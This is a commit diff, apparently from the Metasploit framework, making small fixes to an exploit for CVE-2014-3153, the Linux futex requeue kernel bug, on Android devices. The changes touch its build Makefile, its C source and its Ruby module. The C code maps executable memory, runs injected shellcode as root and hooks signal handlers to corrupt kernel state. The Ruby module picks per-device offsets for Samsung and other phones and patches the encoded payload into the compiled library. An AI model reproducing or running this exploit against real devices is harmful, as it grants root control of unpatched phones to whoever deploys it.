more fixes

Author: timwr

external/source/exploits/CVE-2014-3153/Makefile

@@ -2,7 +2,7 @@
 all: install
 
 build:
-	ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk
+	ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi
 
 install: build
 	mv libs/armeabi/libexploit.so ../../../../data/exploits/CVE-2014-3153.so

external/source/exploits/CVE-2014-3153/futex_requeue.c

@@ -1,4 +1,3 @@
-#include <android/log.h>
 #include <unistd.h>
 #include <linux/futex.h>
 #include <pthread.h>
@@ -12,6 +11,7 @@
 #include <sys/system_properties.h>
 #include <sys/mount.h>
 #include <sys/types.h>
+#include <sys/wait.h>
 #include <sys/socket.h>
 #include <sys/uio.h>
 #include <limits.h>
@@ -56,12 +56,12 @@ int run_shellcode_as_root() {
 	int uid = getuid();
 	if (uid != 0) {
 		LOGV("Not uid=%d, returning\n", uid);
-        return;
+        return 0;
 	}
 
 	if (shellcode_buf[0] == 0x90) {
 		LOGV("No shellcode, uid=%d\n", uid);
-		return;
+		return 0;
 	}
 	LOGV("running shellcode, uid=%d\n", uid);
 
@@ -71,7 +71,7 @@ int run_shellcode_as_root() {
         LOGV("shellcode, pid=%d, tid=%d\n", getpid(), gettid());
 		void *ptr = mmap(0, sizeof(shellcode_buf), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
 		if (ptr == MAP_FAILED) {
-			return;
+			return 0;
 		}
 		memcpy(ptr, shellcode_buf, sizeof(shellcode_buf));
 		void (*shellcode)() = (void(*)())ptr;
@@ -836,14 +836,14 @@ void *make_action_adding_waiter(void *arg) {
 
     // Handler to hack in the kernel.
     act.sa_handler = hack_the_kernel;
-    act.sa_mask = 0;
+    sigemptyset(&act.sa_mask);
     act.sa_flags = 0;
     act.sa_restorer = NULL;
     sigaction(12, &act, NULL);
 
     // Handler to kill useless threads.
     act3.sa_handler = thread_killer;
-    act3.sa_mask = 0;
+    sigemptyset(&act3.sa_mask);
     act3.sa_flags = 0;
     act3.sa_restorer = NULL;
     sigaction(14, &act3, NULL);
@@ -947,7 +947,7 @@ void *stack_modifier(void *name)
 
     // Register an handle for a signal. We will use it to kill this thread later.
     act3.sa_handler = thread_killer;
-    act3.sa_mask = 0;
+    sigemptyset(&act3.sa_mask);
     act3.sa_flags = 0;
     act3.sa_restorer = NULL;
     sigaction(14, &act3, NULL);
@@ -1018,6 +1018,7 @@ void *stack_modifier(void *name)
     }
     LOGD("[STACK MODIFIER] Leaving\n");
 
+    return NULL;
 }
 
 
@@ -1127,7 +1128,7 @@ void *trigger(void *arg) {
     if (*((unsigned long *)hacked_node) == readval) {
         LOGD("[TRIGGER] Device seems to be patched.\n");
         send_pipe_msg(ERROR);
-        return;
+        return 0;
     }
 
     // Save the waiter address
@@ -1280,6 +1281,7 @@ void *trigger(void *arg) {
         }
     }
     stop_for_error();
+    return NULL;
 }
 
 

modules/exploits/android/local/futex_requeue.rb

@@ -95,7 +95,6 @@ def initialize(info={})
   end
 
   def exploit
-    target_index = 1 #default
     if target['auto']
       product = cmd_exec("getprop ro.build.product")
       fingerprint = cmd_exec("getprop ro.build.fingerprint")
@@ -114,28 +113,31 @@ def exploit
         "D2303",
         "cancro",
       ].include? product
-        target_index = 1
+        my_target = targets[1] # Default
       elsif [
         "klte",
         "jflte",
       ].include? product
-        target_index = 2 # New Samsung
+        my_target = targets[2] # New Samsung
       elsif [
         "t03g",
         "m0",
       ].include? product
-        target_index = 3 # Old Samsung
+        my_target = targets[3] # Old Samsung
       elsif [
         "baffinlite",
         "Vodafone_785",
       ].include? product
-        target_index = 4 # Samsung Grand
+        my_target = targets[4] # Samsung Grand
       else
         print_status("Could not automatically target #{product}")
+        my_target = targets[1] # Default
       end
+    else
+      my_target = target
     end
 
-    print_status("Using target: #{targets[target_index].name}")
+    print_status("Using target: #{my_target.name}")
 
     local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2014-3153.so" )
     exploit_data = File.read(local_file, {:mode => 'rb'})
@@ -146,7 +148,7 @@ def exploit
     exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))
 
     # Apply the target config
-    offsets = targets[target_index].opts
+    offsets = my_target.opts
     config_buf = [
       offsets['new_samsung'] ? -1 : 0,
       offsets['iovstack'].to_i,